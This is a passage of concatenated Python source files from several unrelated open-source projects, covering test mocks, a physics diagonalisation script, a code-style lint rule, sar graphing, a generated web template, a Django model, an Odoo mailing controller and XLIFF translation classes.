uuid=None): """For changing injected consumer identity to one that passes is_valid() Returns the injected identity if it need to be examined. """ identity = NonCallableMock(name='ValidIdentityMock') identity.uuid = uuid or "VALIDCONSUMERUUID" identity.is_valid = Mock(return_value=True) identity.cert_dir_path = "/not/a/real/path/to/pki/consumer/" inj.provide(inj.IDENTITY, identity) return identity def _inject_mock_invalid_consumer(self, uuid=None): """For chaining injected consumer identity to one that fails is_valid() Returns the injected identity if it need to be examined. """ invalid_identity = NonCallableMock(name='InvalidIdentityMock') invalid_identity.is_valid = Mock(return_value=False) invalid_identity.uuid = uuid or "INVALIDCONSUMERUUID" invalid_identity.cert_dir_path = "/not/a/real/path/to/pki/consumer/" inj.provide(inj.IDENTITY, invalid_identity) return invalid_identity # use our naming convention here to make it clear # this is our extension. Note that python 2.7 adds a # assertMultilineEquals that assertEqual of strings does # automatically def assert_string_equals(self, expected_str, actual_str, msg=None): if expected_str != actual_str: expected_lines = expected_str.splitlines(True) actual_lines = actual_str.splitlines(True) delta = difflib.unified_diff(expected_lines, actual_lines, "expected", "actual") message = ''.join(delta) if msg: message += " : " + msg self.fail("Multi-line strings are unequal:\n" + message) def assert_equal_dict(self, expected_dict, actual_dict): mismatches = [] missing_keys = [] extra = [] for key in expected_dict: if key not in actual_dict: missing_keys.append(key) continue if expected_dict[key] != actual_dict[key]: mismatches.append((key, expected_dict[key], actual_dict[key])) for key in actual_dict: if key not in expected_dict: extra.append(key) message = "" if missing_keys or extra: message += "Keys in only one dict: \n" if missing_keys: for key in missing_keys: message += "actual_dict: %s\n" % key if extra: for key in extra: message += "expected_dict: %s\n" % key if mismatches: message += "Unequal values: \n" for info in mismatches: message += "%s: %s != %s\n" % info # pprint the dicts message += "\n" message += "expected_dict:\n" message += pprint.pformat(expected_dict) message += "\n" message += "actual_dict:\n" message += pprint.pformat(actual_dict) if mismatches or missing_keys or extra: self.fail(message) def assert_items_equals(self, a, b): """Assert that two lists contain the same items regardless of order.""" if sorted(a, key=lambda item: str(item)) != sorted(b, key=lambda item: str(item)): self.fail("%s != %s" % (a, b)) return True class Capture(object): class Tee(object): def __init__(self, stream, silent): self.buf = six.StringIO() self.stream = stream self.silent = silent def write(self, data): self.buf.write(data) if not self.silent: self.stream.write(data) def flush(self): pass def getvalue(self): return self.buf.getvalue() def isatty(self): return False def __init__(self, silent=False): self.silent = silent def __enter__(self): self.buffs = (self.Tee(sys.stdout, self.silent), self.Tee(sys.stderr, self.silent)) self.stdout = sys.stdout self.stderr = sys.stderr sys.stdout, sys.stderr = self.buffs return self @property def out(self): return self.buffs[0].getvalue() @property def err(self): return self.buffs[1].getvalue() def __exit__(self, exc_type, exc_value, traceback): sys.stdout = self.stdout sys.stderr = self.stderr def set_up_mock_sp_store(mock_sp_store): """ Sets up the mock syspurpose store with methods that are mock versions of the real deal. Allows us to test in the absence of the syspurpose module. This documents the essential expected behaviour of the methods subman relies upon from the syspurpose codebase. :return: """ contents = {} mock_sp_store_contents = contents def set(item, value): contents[item] = value def read(path, raise_on_error=False): return mock_sp_store def unset(item): contents[item] = None def add(item, value): current = contents.get(item, []) if value not in current: current.append(value) contents[item] = current def remove(item, value): current = contents.get(item) if current is not None and isinstance(current, list) and value in current: current.remove(value) def get_local_contents(): return contents def get_cached_contents(): return contents def update_local(data): global contents contents = data mock_sp_store.return_value.set = Mock(side_effect=set) mock_sp_store.return_value.read = Mock(side_effect=read) mock_sp_store.return_value.unset = Mock(side_effect=unset) mock_sp_store.return_value.add = Mock(side_effect=add) mock_sp_store.return_value.remove = Mock(side_effect=remove) mock_sp_store.return_value.local_contents = mock_sp_store_contents mock_sp_store.return_value.get_local_contents = Mock(side_effect=get_local_contents) mock_sp_store.return_value.update_local = Mock(side_effect=update_local) mock_sp_store.return_value.get_cached_contents = Mock(side_effect=get_cached_contents) return mock_sp_store, mock_sp_store_contents
jotterbach/ExactDiagonalization_PolarizedFermionicDipolesOnZigZagChain
DiagonalizationMethods.py
# -*- coding: utf-8 -*- """ Created on Wed Jun 26 11:09:05 2013 @author: jotterbach """ from numpy import * from ED_HalfFilling import EigSys_HalfFilling from DotProduct import scalar_prod from multiprocessing import * from multiprocessing import Pool import matplotlib.pyplot as plt from ParallelizationTools import info from os.path import * from scipy.special import * from scipy.linalg import qr from DotProduct import scalar_prod from Correlation_Generator import * from datetime import datetime ''' define the datestamp for the filenames ''' date = str(datetime.now()) now = date[0:10]+'_'+date[11:13]+'h'+date[14:16]+'m' def AngleSpectrum(number_particles, noEV, gamma, hopping, angle): """ AngleSpectrum(number_particles, noEV, gamma, hopping, angle): computes the energy eigenspectrum as a function of the angle of the dipoles with the chain axis given an unit interaction V and a hopping J parameters of the function: number_particles: number of particles in the problem noEV: number of eigenvalues being calculated gamma: opening angle of the zig-zag chain hopping: hopping parameter in units of interaction V angle: array containing the angles as a multiple of **PI** """ ''' default values for other methods that are being called by the current function ''' spectrum = 1 #ensures that the spectrum is calculated in EigSys_HalfFilling independet_v1_v2 = 1 #makes v1 and v2 independent of each other number_sites = 2*number_particles #condition for half-filling interaction_strength = 1 #unit of energy # number_particles = 6 # noEV = 5*number_sites #degeneracy of GS requires noEV>number_sites # hopping = .1 # gamma = 2*pi/3 # angle = linspace(-.8,-.7,41) ''' intialization of variables that will be stored for later use ''' eigval = zeros((angle.shape[0],noEV), dtype = float) degeneracies = zeros((angle.shape[0],1)) v1 = zeros((angle.shape[0],1)) v2 = zeros((angle.shape[0],1)) v3 = zeros((angle.shape[0],1)) ''' actual method call ''' if __name__ == 'DiagonalizationMethods': info('main line') pool = Pool() ''' invocation of the eigenvalue procedure ''' it = [pool.apply_async(EigSys_HalfFilling, (number_particles, number_sites, hopping, interaction_strength, angle[angle_idx], noEV, spectrum, gamma, independet_v1_v2)) for angle_idx in range(0,angle.shape[0])] for ridx in it: angle_idx = nonzero(angle == ridx.get()[0]) eigval[angle_idx,:]= ridx.get()[1]#floor(10*around(real(ridx.get()[1]),decimals = 2))/10 degeneracies[angle_idx] = sum((eigval[angle_idx,:] == eigval[angle_idx,0]).astype(int)) v1[angle_idx]=ridx.get()[2] v2[angle_idx]=ridx.get()[3] v3[angle_idx]=ridx.get()[4] print 'angle:', angle[angle_idx], '\nground-state degeneracy:', degeneracies[angle_idx] filename = 'FigureData/'+now+'_AngleSpectrum_N'+str(number_particles)+'_J'+str(hopping).replace('.','-')+'_vdd'+str(interaction_strength).replace('.','-') save(filename+'_EigVals', eigval) save(filename+'_angle', angle) print 'saved: '+filename def InteractionSpectrum(number_particles, noEV, gamma, angle, interaction_strength): ''' computes the eigenvalue spectrum for a given angle as a function of the interaction strength in units of J parameters of the function: number_particles: number of particles in the problem noEV: number of eigenvalues being calculated gamma: opening angle of the zig-zag chain angle: array containing the angles as a multiple of **PI** interaction_strength: interaction in units of hopping J ''' ''' default values for other methods that are being called by the current function ''' spectrum = 1 #ensures that the spectrum is calculated in EigSys_HalfFilling independent_v1_v2 = 1 #makes v1 and v2 independent of each other number_sites = 2*number_particles #condition for half-filling hopping = 1 #unit of energy ''' intialization of variables that will be stored for later use ''' eigval = zeros((len(interaction_strength),noEV), dtype = float) v1 = zeros((interaction_strength.shape[0],1)) v2 = zeros((interaction_strength.shape[0],1)) v3 = zeros((interaction_strength.shape[0],1)) ''' actual method call ''' if __name__ == 'DiagonalizationMethods': info('main line') pool = Pool() ''' invocation of eigenvalue procedure ''' it = [pool.apply_async(EigSys_HalfFilling, (number_particles, number_sites, hopping, interaction_strength[idx], angle, noEV, spectrum, gamma, independent_v1_v2)) for idx in range(len(interaction_strength))] for ridx in it: idx = nonzero(interaction_strength == ridx.get()[6]) v1=ridx.get()[2] v2=ridx.get()[3] v3=ridx.get()[4] eigval[idx,:]= ridx.get()[1]#floor(10*around(real(ridx.get()[1]),decimals = 2))/10 print 'interaction:', interaction_strength[idx], 'interaction constants: ', v1,v2,v3 filename = 'FigureData/'+now+'_InteractionSpectrum_N'+str(number_particles)+'_J'+str(hopping).replace('.','-')+'_Theta'+str(angle).replace('.','-') save(filename+'_EigVals', eigval) save(filename+'_interaction',interaction_strength) print 'saved: '+filename def HoppingSpectrum(number_particles, noEV, gamma, angle, hopping): ''' computes the eigenvalue spectrum for given interactions as a function of the hopping in units of interaction V parameters of the function: number_particles: number of particles in the problem noEV: number of eigenvalues being calculated gamma: opening angle of the zig-zag chain angle: array containing the angles as a multiple of **PI** hopping: hopping in units of interaction V ''' ''' default values for other methods that are being called by the current function ''' spectrum = 1 #ensures that the spectrum is calculated in EigSys_HalfFilling independent_v1_v2 = 1 #makes v1 and v2 independent of each other number_sites = 2*number_particles #condition for half-filling interaction_strength = 1 #unit of energy ''' intialization of variables that will be stored for later use ''' eigval = zeros((len(hopping),noEV), dtype = float) v1 = zeros((hopping.shape[0],1)) v2 = zeros((hopping.shape[0],1)) v3 = zeros((hopping.shape[0],1)) ''' actual method call ''' if __name__ == 'DiagonalizationMethods': info('main line') pool = Pool() ''' invocation of eigenvalue procedure ''' it = [pool.apply_async(EigSys_HalfFilling, (number_particles, number_sites, hopping[idx], interaction_strength, angle, noEV, spectrum, gamma, independent_v1_v2)) for idx in range(len(hopping))] for ridx in it: idx = nonzero(hopping == ridx.get()[5]) v1=ridx.get()[2] v2=ridx.get()[3] v3=ridx.get()[4] eigval[idx,:]= ridx.get()[1] print 'hopping:', hopping[idx], 'interactions: ', v1,v2,v3 filename = 'FigureData/'+now+'_HoppingSpectrum-nnhopping_N'+str(number_particles)+'_vdd'+str(interaction_strength).replace('.','-')+'_Theta'+str(angle).replace('.','-') save(filename+'_EigVals', eigval) save(filename+'_hopping', hopping) print 'saved: '+filename def DensityCorrelations(number_particles, noEV, gamma, angle, hopping, degeneracy): ''' computes the density correlation function for a given set of angle, interaction and hopping''' ''' default values for other methods that are being called by the current function ''' spectrum = 0 #ensures that the spectrum AND the eigenvectors are calculated in EigSys_HalfFilling independent_v1_v2 = 1 #makes v1 and v2 independent of each other number_sites = 2*number_particles #condition for half-filling interaction_strength = 1 #unit of energy ''' function specific parameter initilaization ''' eigval, eigvec, basisstates = EigSys_HalfFilling(number_particles, number_sites, hopping, interaction_strength, angle, noEV, spectrum, gamma, independent_v1_v2) eigval = around(real(eigval),decimals = 2) print '\nlow-energy spectrum: \n', eigval print 'GS degeneracy:', degeneracy eigvec = eigvec.astype(complex) if degeneracy > 1: print '\nOrthogonalizing GS manifold' eigvec_GS = zeros((eigvec.shape[0],degeneracy), dtype = complex) for m in range(degeneracy): eigvec_GS[:,m] = eigvec[:,m] Q, R = qr(eigvec_GS, mode = 'economic') for m in range(degeneracy): eigvec[:,m] = Q[:,m] del Q, R, eigvec_GS number_states = basisstates.shape[0] if __name__ == 'DiagonalizationMethods': ''' local density ''' print '\nCalculating local density' local_density = zeros((2*number_particles,1), dtype = float) pool = Pool() for deg_idx in range(0,degeneracy): print 'state index: ', deg_idx it = [pool.apply_async(loc_den, (basisstates, number_particles, number_states, eigvec[:,deg_idx], site_idx)) for site_idx in range(0,2*number_particles)] for ridx in it: site_idx = ridx.get()[0] local_density[site_idx] += real(ridx.get()[1])/degeneracy ''' density-density correlation ''' print '\nCalculating density-density correlations' g2 = zeros((number_sites,1), dtype = float) for deg_idx in range(0,degeneracy): print 'state index: ', deg_idx it = [pool.apply_async(pair_corr, (basisstates, number_particles, number_sites, number_states, eigvec[:,deg_idx], site_idx)) for site_idx in range(0,number_sites)] for ridx in it: site_idx = ridx.get()[0] g2[site_idx] += real(ridx.get()[1])/degeneracy filename='FigureData/'+now+'_Correlations_N'+str(number_particles)+'_J'+str(hopping).replace('.','-')+'_vdd'+str(interaction_strength).replace('.','-')+'_Theta'+str(angle).replace('.','-') save(filename+'_local_density', local_density) save(filename+'_g2', g2) print 'saved: '+filename
widelands/widelands
cmake/codecheck/rules/contrived_std_string_find.py
#!/usr/bin/python """Do not call std::string::find_first_of or std::string::find with a string of characters to locate that has the size 1. Use the version of std::string::find that takes a single character to locate instead. Same for find_last_of/rfind. """ error_msg = "Do not use find(\"a\"), use find('a')." regexp = r"""(?x) r?find(_(first|last)_of)?\s* \( "([^\\]|(\\[nt\\"]))"[,)]""" forbidden = [ r'find_first_of("a")', r'find_last_of("a")', r'find("a")', r'rfind("a")', r'find_first_of("\n")', r'find_last_of("\n")', r'find("\n")', r'rfind("\n")', r'find_first_of("\t")', r'find_last_of("\t")', r'find("\t")', r'rfind("\t")', r'find_first_of("\\")', r'find_last_of("\\")', r'find("\\")', r'rfind("\\")', r'find_first_of("\"")', r'find_last_of("\"")', r'find("\"")', r'rfind("\"")', r'find_first_of("a", 1)', r'find_last_of("a", 1)', r'find("a", 1)', r'rfind("a", 1)', ] allowed = [ r'find("ab")', r"find('a')", r"rfind('a')", r'rfind("ab")', r"find('\n')", r'find("\nx")', r"rfind('\n')", r'rfind("\nx")', r"find('\t')", r'find("\tx")', r"rfind('\t')", r'rfind("\tx")', r"find('\\')", r'find("\\x")', r"rfind('\\')", r'rfind("\\x")', r"find('\"')", r'find("\"x")', r"rfind('\"')", r'rfind("\"x")', r"find('a', 1)", r'find("ab", 1)', r"rfind('a', 1)", r'rfind("ab", 1)', ]
mbaldessari/sarstats
sar_grapher.py
import hashlib import matplotlib # Force matplotlib to not use any Xwindows backend. matplotlib.use('Agg') import matplotlib.pyplot as plt import matplotlib.dates as mdates import matplotlib.colors as colors import matplotlib.cm as cm from matplotlib.patches import Rectangle import os import shutil import tempfile from sar_parser import SarParser # If the there are more than 50 plots in a graph we move the legend to the # bottom LEGEND_THRESHOLD = 50 def ascii_date(d): return "%s" % (d.strftime("%Y-%m-%d %H:%M")) class SarGrapher(object): def __init__(self, filenames, starttime=None, endtime=None): """Initializes the class, creates a SarParser class given a list of files and also parsers the files""" # Temporary dir where images are stored (one per graph) # NB: This is done to keep the memory usage constant # in spite of being a bit slower (before this change # we could use > 12GB RAM for a simple sar file - # matplotlib is simply inefficient in this area) self._tempdir = tempfile.mkdtemp(prefix='sargrapher') self.sar_parser = SarParser(filenames, starttime, endtime) self.sar_parser.parse() duplicate_timestamps = self.sar_parser._duplicate_timestamps if duplicate_timestamps: print("There are {0} lines with duplicate timestamps. First 10" "line numbers at {1}".format( len(duplicate_timestamps.keys()), sorted(list(duplicate_timestamps.keys()))[:10])) def _graph_filename(self, graph, extension='.png'): """Creates a unique constant file name given a graph or graph list""" if isinstance(graph, list): temp = "_".join(graph) else: temp = graph temp = temp.replace('%', '_') temp = temp.replace('/', '_') digest = hashlib.sha1() digest.update(temp.encode('utf-8')) fname = os.path.join(self._tempdir, digest.hexdigest() + extension) return fname def datasets(self): """Returns a list of all the available datasets""" return self.sar_parser.available_data_types() def timestamps(self): """Returns a list of all the available datasets""" return sorted(self.sar_parser.available_timestamps()) def plot_datasets(self, data, fname, extra_labels, showreboots=False, output='pdf'): """ Plot timeseries data (of type dataname). The data can be either simple (one or no datapoint at any point in time, or indexed (by indextype). dataname is assumed to be in the form of [title, [label1, label2, ...], [data1, data2, ...]] extra_labels is a list of tuples [(datetime, 'label'), ...] """ sar_parser = self.sar_parser title = data[0][0] unit = data[0][1] axis_labels = data[0][2] datanames = data[1] if not isinstance(datanames, list): raise Exception("plottimeseries expects a list of datanames: %s" % data) fig = plt.figure(figsize=(10.5, 6.5)) axes = fig.add_subplot(111) axes.set_title('{0} time series'.format(title), fontsize=12) axes.set_xlabel('Time') axes.xaxis.set_major_formatter(mdates.DateFormatter('%m-%d %H:%M')) # Twenty minutes. Could probably make it a parameter axes.xaxis.set_minor_locator(mdates.MinuteLocator(interval=20)) fig.autofmt_xdate() ylabel = title if unit: ylabel += " - " + unit axes.set_ylabel(ylabel) y_formatter = matplotlib.ticker.ScalarFormatter(useOffset=False) axes.yaxis.set_major_formatter(y_formatter) axes.yaxis.get_major_formatter().set_scientific(False) color_norm = colors.Normalize(vmin=0, vmax=len(datanames) - 1) scalar_map = cm.ScalarMappable(norm=color_norm, cmap=plt.get_cmap('Set1')) timestamps = self.timestamps() counter = 0 for i in datanames: try: dataset = [sar_parser._data[d][i] for d in timestamps] except: print("Key {0} does not exist in this graph".format(i)) raise axes.plot(timestamps, dataset, 'o:', label=axis_labels[counter], color=scalar_map.to_rgba(counter)) counter += 1 # Draw extra_labels if extra_labels: for extra in extra_labels: axes.annotate(extra[1], xy=(mdates.date2num(extra[0]), sar_parser.find_max(extra[0], datanames)), xycoords='data', xytext=(30, 30), textcoords='offset points', arrowprops=dict(arrowstyle="->", connectionstyle="arc3,rad=.2")) # If we have a sosreport draw the reboots if showreboots and sar_parser.sosreport is not None and \ sar_parser.sosreport.reboots is not None: reboots = sar_parser.sosreport.reboots for reboot in reboots.keys(): reboot_date = reboots[reboot]['date'] rboot_x = mdates.date2num(reboot_date) (xmin, xmax) = plt.xlim() (ymin, ymax) = plt.ylim() if rboot_x < xmin or rboot_x > xmax: continue axes.annotate('', xy=(mdates.date2num(reboot_date), ymin), xycoords='data', xytext=(-30, -30), textcoords='offset points', arrowprops=dict(arrowstyle="->", color='blue', connectionstyle="arc3,rad=-0.1")) # Show any data collection gaps in the graph gaps = sar_parser.find_data_gaps() if len(gaps) > 0: for i in gaps: (g1, g2) = i x1 = mdates.date2num(g1) x2 = mdates.date2num(g2) (ymin, ymax) = plt.ylim() axes.add_patch(Rectangle((x1, ymin), x2 - x1, ymax - ymin, facecolor="lightgrey")) # Add a grid to the graph to ease visualization axes.grid(True) lgd = None # Draw the legend only when needed if len(datanames) > 1 or \ (len(datanames) == 1 and len(datanames[0].split('#')) > 1): # We want the legends box roughly square shaped # and not take up too much room props = matplotlib.font_manager.FontProperties(size='xx-small') if len(datanames) < LEGEND_THRESHOLD: cols = int((len(datanames) ** 0.5)) lgd = axes.legend(loc=1, ncol=cols, shadow=True, prop=props) else: cols = int(len(datanames) ** 0.6) lgd = axes.legend(loc=9, ncol=cols, bbox_to_anchor=(0.5, -0.29), shadow=True, prop=props) if len(datanames) == 0: return None try: if lgd: plt.savefig(fname, bbox_extra_artists=(lgd,), bbox_inches='tight') else: plt.savefig(fname, bbox_inches='tight') except: import traceback print(traceback.format_exc()) import sys sys.exit(-1) plt.cla() plt.clf() plt.close('all') def plot_svg(self, graphs, output, labels): """Given a list of graphs, output an svg file per graph. Input is a list of strings. A graph with multiple datasets is a string with datasets separated by comma""" if output == 'out.pdf': output = 'graph' counter = 1 fnames = [] for i in graphs: subgraphs = i.split(',') fname = self._graph_filename(subgraphs, '.svg') fnames.append(fname) self.plot_datasets((['', None, subgraphs], subgraphs), fname, labels) dest = os.path.join(os.getcwd(), "{0}{1}.svg".format( output, counter)) shutil.move(fname, dest) print("Created: {0}".format(dest)) counter += 1 # removes all temporary files and directories self.close() def plot_ascii(self, graphs, def_columns=80, def_rows=25): """Displays a single graph in ASCII form on the terminal""" import subprocess sar_parser = self.sar_parser timestamps = self.timestamps() try: rows, columns = os.popen('stty size', 'r').read().split() except: columns = def_columns rows = def_rows if columns > def_columns: columns = def_columns for graph in graphs: try: gnuplot = subprocess.Popen(["/usr/bin/gnuplot"], stdin=subprocess.PIPE) except Exception as e: raise("Error launching gnuplot: {0}".format(e)) gnuplot.stdin.write("set term dumb {0} {1}\n".format( columns, rows)) gnuplot.stdin.write("set xdata time\n") gnuplot.stdin.write('set xlabel "Time"\n') gnuplot.stdin.write('set timefmt \"%Y-%m-%d %H:%M\"\n') gnuplot.stdin.write('set xrange [\"%s\":\"%s\"]\n' % (ascii_date(timestamps[0]), ascii_date(timestamps[-1]))) gnuplot.stdin.write('set ylabel "%s"\n' % (graph)) gnuplot.stdin.write('set datafile separator ","\n') gnuplot.stdin.write('set autoscale y\n') gnuplot.stdin.write('set title "%s - %s"\n' % (graph, " ".join(sar_parser._files))) # FIXME: do it through a method try: dataset = [sar_parser._data[d][graph] for d in timestamps] except KeyError: print("Key '{0}' could not be found") return txt = "plot '-' using 1:2 title '{0}' with linespoints \n".format( graph) gnuplot.stdin.write(txt) for i, j in zip(timestamps, dataset): s = '\"%s\",%f\n' % (ascii_date(i), j) gnuplot.stdin.write(s) gnuplot.stdin.write("e\n") gnuplot.stdin.write("exit\n") gnuplot.stdin.flush() def export_csv(self): return def close(self): """Removes temporary directory and files""" if os.path.isdir(self._tempdir): shutil.rmtree(self._tempdir)
MOA-2011/enigma2-plugin-extensions-openwebif
plugin/controllers/views/web/gettags.py
#!/usr/bin/env python ################################################## ## DEPENDENCIES import sys import os import os.path try: import builtins as builtin except ImportError: import __builtin__ as builtin from os.path import getmtime, exists import time import types from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple from Cheetah.Template import Template from Cheetah.DummyTransaction import * from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList from Cheetah.CacheRegion import CacheRegion import Cheetah.Filters as Filters import Cheetah.ErrorCatchers as ErrorCatchers ################################################## ## MODULE CONSTANTS VFFSL=valueFromFrameOrSearchList VFSL=valueFromSearchList VFN=valueForName currentTime=time.time __CHEETAH_version__ = '2.4.4' __CHEETAH_versionTuple__ = (2, 4, 4, 'development', 0) __CHEETAH_genTime__ = 1406885498.501688 __CHEETAH_genTimestamp__ = 'Fri Aug 1 18:31:38 2014' __CHEETAH_src__ = '/home/wslee2/models/5-wo/force1plus/openpli3.0/build-force1plus/tmp/work/mips32el-oe-linux/enigma2-plugin-extensions-openwebif-1+git5+3c0c4fbdb28d7153bf2140459b553b3d5cdd4149-r0/git/plugin/controllers/views/web/gettags.tmpl' __CHEETAH_srcLastModified__ = 'Fri Aug 1 18:30:05 2014' __CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine' if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple: raise AssertionError( 'This template was compiled with Cheetah version' ' %s. Templates compiled before version %s must be recompiled.'%( __CHEETAH_version__, RequiredCheetahVersion)) ################################################## ## CLASSES class gettags(Template): ################################################## ## CHEETAH GENERATED METHODS def __init__(self, *args, **KWs): super(gettags, self).__init__(*args, **KWs) if not self._CHEETAH__instanceInitialized: cheetahKWArgs = {} allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split() for k,v in KWs.items(): if k in allowedKWs: cheetahKWArgs[k] = v self._initCheetahInstance(**cheetahKWArgs) def respond(self, trans=None): ## CHEETAH: main method generated for this template if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)): trans = self.transaction # is None unless self.awake() was called if not trans: trans = DummyTransaction() _dummyTrans = True else: _dummyTrans = False write = trans.response().write SL = self._CHEETAH__searchList _filter = self._CHEETAH__currentFilter ######################################## ## START - generated method body _orig_filter_91099948 = _filter filterName = u'WebSafe' if self._CHEETAH__filters.has_key("WebSafe"): _filter = self._CHEETAH__currentFilter = self._CHEETAH__filters[filterName] else: _filter = self._CHEETAH__currentFilter = \ self._CHEETAH__filters[filterName] = getattr(self._CHEETAH__filtersLib, filterName)(self).filter write(u'''<?xml version="1.0" encoding="UTF-8"?> <e2tags> ''') for tag in VFFSL(SL,"tags",True): # generated from line 4, col 2 write(u'''\t\t<e2tag>''') _v = VFFSL(SL,"tag",True) # u'$tag' on line 5, col 10 if _v is not None: write(_filter(_v, rawExpr=u'$tag')) # from line 5, col 10. write(u'''</e2tag> ''') write(u'''</e2tags> ''') _filter = self._CHEETAH__currentFilter = _orig_filter_91099948 ######################################## ## END - generated method body return _dummyTrans and trans.response().getvalue() or "" ################################################## ## CHEETAH GENERATED ATTRIBUTES _CHEETAH__instanceInitialized = False _CHEETAH_version = __CHEETAH_version__ _CHEETAH_versionTuple = __CHEETAH_versionTuple__ _CHEETAH_genTime = __CHEETAH_genTime__ _CHEETAH_genTimestamp = __CHEETAH_genTimestamp__ _CHEETAH_src = __CHEETAH_src__ _CHEETAH_srcLastModified = __CHEETAH_srcLastModified__ _mainCheetahMethod_for_gettags= 'respond' ## END CLASS DEFINITION if not hasattr(gettags, '_initCheetahAttributes'): templateAPIClass = getattr(gettags, '_CHEETAH_templateClass', Template) templateAPIClass._addCheetahPlumbingCodeToClass(gettags) # CHEETAH was developed by Tavis Rudd and Mike Orr # with code, advice and input from many other volunteers. # For more information visit http://www.CheetahTemplate.org/ ################################################## ## if run from command line: if __name__ == '__main__': from Cheetah.TemplateCmdLineIface import CmdLineIface CmdLineIface(templateObj=gettags()).run()
marios-zindilis/musicbrainz-django-models
musicbrainz_django_models/models/editor_subscribe_label_deleted.py
""" .. module:: editor_subscribe_label_deleted The **Editor Subscribe Label Deleted** Model. PostgreSQL Definition --------------------- The :code:`editor_subscribe_label_deleted` table is defined in the MusicBrainz Server as: .. code-block:: sql CREATE TABLE editor_subscribe_label_deleted ( editor INTEGER NOT NULL, -- PK, references editor.id gid UUID NOT NULL, -- PK, references deleted_entity.gid deleted_by INTEGER NOT NULL -- references edit.id ); """ from django.db import models from django.utils.encoding import python_2_unicode_compatible @python_2_unicode_compatible class editor_subscribe_label_deleted(models.Model): """ Not all parameters are listed here, only those that present some interest in their Django implementation. :param editor: references :class:`.editor` :param gid: references :class:`.deleted_entity` :param deleted_by: references :class:`.edit` """ editor = models.OneToOneField('editor', primary_key=True) gid = models.OneToOneField('deleted_entity') deleted_by = models.ForeignKey('edit') def __str__(self): return 'Editor Subscribe Label Deleted' class Meta: db_table = 'editor_subscribe_label_deleted'
3dfxsoftware/cbss-addons
mass_mailing/controllers/main.py
import werkzeug from openerp import http, SUPERUSER_ID from openerp.http import request class MassMailController(http.Controller): @http.route('/mail/track/<int:mail_id>/blank.gif', type='http', auth='none') def track_mail_open(self, mail_id, **post): """ Email tracking. """ mail_mail_stats = request.registry.get('mail.mail.statistics') mail_mail_stats.set_opened(request.cr, SUPERUSER_ID, mail_mail_ids=[mail_id]) response = werkzeug.wrappers.Response() response.mimetype = 'image/gif' response.data = 'R0lGODlhAQABAIAAANvf7wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='.decode('base64') return response @http.route(['/mail/mailing/<int:mailing_id>/unsubscribe'], type='http', auth='none') def mailing(self, mailing_id, email=None, res_id=None, **post): cr, uid, context = request.cr, request.uid, request.context MassMailing = request.registry['mail.mass_mailing'] mailing_ids = MassMailing.exists(cr, SUPERUSER_ID, [mailing_id], context=context) if not mailing_ids: return 'KO' mailing = MassMailing.browse(cr, SUPERUSER_ID, mailing_ids[0], context=context) if mailing.mailing_model == 'mail.mass_mailing.contact': list_ids = [l.id for l in mailing.contact_list_ids] record_ids = request.registry[mailing.mailing_model].search(cr, SUPERUSER_ID, [('list_id', 'in', list_ids), ('id', '=', res_id), ('email', 'ilike', email)], context=context) request.registry[mailing.mailing_model].write(cr, SUPERUSER_ID, record_ids, {'opt_out': True}, context=context) else: email_fname = None if 'email_from' in request.registry[mailing.mailing_model]._all_columns: email_fname = 'email_from' elif 'email' in request.registry[mailing.mailing_model]._all_columns: email_fname = 'email' if email_fname: record_ids = request.registry[mailing.mailing_model].search(cr, SUPERUSER_ID, [('id', '=', res_id), (email_fname, 'ilike', email)], context=context) if 'opt_out' in request.registry[mailing.mailing_model]._all_columns: request.registry[mailing.mailing_model].write(cr, SUPERUSER_ID, record_ids, {'opt_out': True}, context=context) return 'OK'
miurahr/translate
translate/storage/poxliff.py
# # Copyright 2006-2009 Zuza Software Foundation # # This file is part of the Translate Toolkit. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, see <http://www.gnu.org/licenses/>. """XLIFF classes specifically suited for handling the PO representation in XLIFF. This way the API supports plurals as if it was a PO file, for example. """ import re from lxml import etree from translate.misc.multistring import multistring from translate.misc.xml_helpers import setXMLspace from translate.storage import base, lisa, poheader, xliff from translate.storage.placeables import general def hasplurals(thing): if not isinstance(thing, multistring): return False return len(thing.strings) > 1 class PoXliffUnit(xliff.xliffunit): """A class to specifically handle the plural units created from a po file.""" rich_parsers = general.parsers def __init__(self, source=None, empty=False, **kwargs): self._rich_source = None self._rich_target = None self._state_n = 0 self.units = [] if empty: return if not hasplurals(source): super().__init__(source) return self.xmlelement = etree.Element(self.namespaced("group")) self.xmlelement.set("restype", "x-gettext-plurals") self.source = source def __eq__(self, other): if isinstance(other, PoXliffUnit): if len(self.units) != len(other.units): return False if not super().__eq__(other): return False for i in range(len(self.units) - 1): if not self.units[i + 1] == other.units[i + 1]: return False return True if len(self.units) <= 1: if isinstance(other, lisa.LISAunit): return super().__eq__(other) else: return self.source == other.source and self.target == other.target return False # XXX: We don't return language nodes correctly at the moment # def getlanguageNodes(self): # if not self.hasplural(): # return super().getlanguageNodes() # else: # return self.units[0].getlanguageNodes() @property def source(self): if not self.hasplural(): return super().source return multistring([unit.source for unit in self.units]) @source.setter def source(self, source): self.setsource(source, sourcelang="en") def setsource(self, source, sourcelang="en"): # TODO: consider changing from plural to singular, etc. self._rich_source = None if not hasplurals(source): super().setsource(source, sourcelang) else: target = self.target for unit in self.units: try: self.xmlelement.remove(unit.xmlelement) except ValueError: pass self.units = [] for s in source.strings: newunit = xliff.xliffunit(s) # newunit.namespace = self.namespace #XXX?necessary? self.units.append(newunit) self.xmlelement.append(newunit.xmlelement) self.target = target # We don't support any rich strings yet multistring_to_rich = base.TranslationUnit.multistring_to_rich rich_to_multistring = base.TranslationUnit.rich_to_multistring rich_source = base.TranslationUnit.rich_source rich_target = base.TranslationUnit.rich_target def gettarget(self, lang=None): if self.hasplural(): strings = [unit.target for unit in self.units] if strings: return multistring(strings) else: return None else: return super().gettarget(lang) def settarget(self, target, lang="xx", 